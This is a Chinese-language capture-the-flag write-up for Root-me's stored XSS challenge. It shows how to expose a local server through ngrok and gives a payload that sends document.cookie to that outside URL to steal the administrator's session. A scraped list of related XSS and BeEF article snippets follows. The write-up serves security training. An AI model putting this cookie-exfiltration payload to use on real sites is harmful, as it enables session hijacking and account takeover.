[Root-me]XSS - Stored 1
个人博客地址
http://www.darkerbox.com
欢迎大家学习交流
Root-me网址:
https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1
题目描述
Steal the administrator session cookie and use it to validate this chall.
窃取管理员会话cookie并使用它来验证这个挑战
这是一个存储型xss的题目,目的是获得管理员的cookie。
这里应该可以用xsspt.com(公共xss平台)获取管理员cookie。
我没有这样做,我get了一个新知识。
ngrok
这个工具我也不熟,下面如果有不对的地方,请斧正
ngrok应该利用了内网转发的功能。
先在https://dashboard.ngrok.com/signup注册一个账号
登录之后,如图
一共分四步:写的很详细:
- 下载对应系统的安装包
- 解压安装包
- 使用./ngrop authtoken <your token>命令连接你的账号
- 查看帮助信息
首先我们使用以下命令在kali上搭建一个简易的服务器
php -S localhost:9999
然后你先执行第三步的命令
./ngrop authtoken <your token>
然后再执行下条命令
./ngrok http 9999
红框中的网址即你外网的地址,这里应该是将这个地址映射到了kali本机的9999端口。
所以我们(在外网)访问这个地址就可以访问内网的kali了
有了url地址,开始做题了
构造payload:
<script>document.write('<img src="http://a76086d7.ngrok.io?cmd='+document.cookie+'" width=0 height=0 border=0 />');</script>
获取到了我自己的cookie
几分钟后获得管理员cookie。cookie即flag。
欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群
[Root-me]XSS - Stored 1相关推荐
- 【Kali渗透全方位实战】利用Beef进行XSS会话劫持(XSS Stored)
文章目录 1 会话劫持 2 kali中beef的使用 3 开始渗透 2.1 修改dvwa xss stored等级为low 2.2 script 标签 2.3 过程演示 2.4 会话劫持 2.5 换一 ...
- DVWA通关--存储型XSS(XSS (Stored))
目录 LOW 通关步骤 源码分析 MEDIUM 通关步骤 源码分析 HIGH 通关步骤 源码分析 IMPOSSIBLE 源码分析 存储型XSS也叫持久型XSS,从名字就知道特征是攻击代码会被存储在数据 ...
- 跨站脚本(XSS)攻击
什么是XSS 全称:Cross Site Script(跨站脚本) 为了与层叠样式表css区分,将跨站脚本简写为XSS 危害:盗取用户信息.钓鱼.制造蠕虫等. 概念 概念:黑客通过"HTML ...
- xss漏洞利用方式总结
目录 搭建XSS平台 窃取cookie 抓取屏幕截图 重定向 植入广告 恶意链接 获取键盘记录 网页钓鱼 网页挂马 搭建XSS平台 首先,我们需要一个XSS平台,自己搭建一个还是使用在线的都可以,本人 ...
- XSS注入(1)-两个简单测试理解反射型xss注入和存储型xss注入
XSS注入(1)-两个例子理解反射型xss注入和存储型xss注入 XSS全称 Cross Site Script,为使与css语言重名,所以我们将其称为xss跨站脚本攻击.它指的是恶意攻击者往Web页 ...
- DVWA1.9平台XSS小结
LOW级别就不写了...... 直接上中高级别(结合源码更好理解) 1.XSS Reflected(Medium) 从源码中可以清楚的看到,输入的<script>标签被过滤掉了,看清了,只 ...
- DVWA系列之21 存储型XSS分析与利用
存储型跨站可以将XSS语句直接写入到数据库中,因而相比反射型跨站的利用价值要更大. 在DVWA中选择XSS stored,这里提供了一个类型留言本的页面. 我们首先查看low级别的代码,这里提供了$m ...
- 怎样利用超图客户端打点_渗透测试——XSS利用工具BeEF攻击演示
跨站脚本漏洞(Cross-site scripting,通常简称为XSS)发生在客户端,可被用于进行窃取隐私.钓鱼欺骗.窃取密码.传播恶意代码等攻击.XSS攻击使用到的技术主要为HTML和Javasc ...
- Cross-Site Scripting(XSS)的类型
本文源自: https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting 在原文理解上翻译为中文. 背景 本文描述多种不同类型的XSS攻击 ...
最新文章
- 计算机反面的考研专业,2018计算机考研:历年准考证打印常见七大问题
- BZOJ4921「Lydsy1706月赛」互质序列
- nginx虚拟目录实现两个后台使用
- 【转】OWIN是什么?
- 怎样在matlab q-q图上读出斜率,Q分解法潮流计算matlab小程序
- ubuntu 文件权限命令详解使用格式和方法
- 如何使用openssl生成RSA公钥和私钥对
- Android studio : 模拟器 真机 运行失败(mac电脑)
- HiveSQL和普通SQL的区别
- 超级好用的高颜值终端工具---Tabby
- 【视角】限贷传闻横扫楼市 专家看空房地产业
- IPFS-Cluster 集群安装与验证测试
- 感恩2020,期待2021
- 前端工程师必备:前端的模块化
- 算法24c语言,EEPROM(AT24C16)页写算法
- 如何制作自己的网页java_怎样制作自己的购物网站页面?
- 收藏本站和设为主页代码(HTML)
- Web前端开发工程师必备技术列表
- C# 抓图服务的实现
- 《炬丰科技-半导体工艺》 组合式 CMP 和晶片清洗装置方法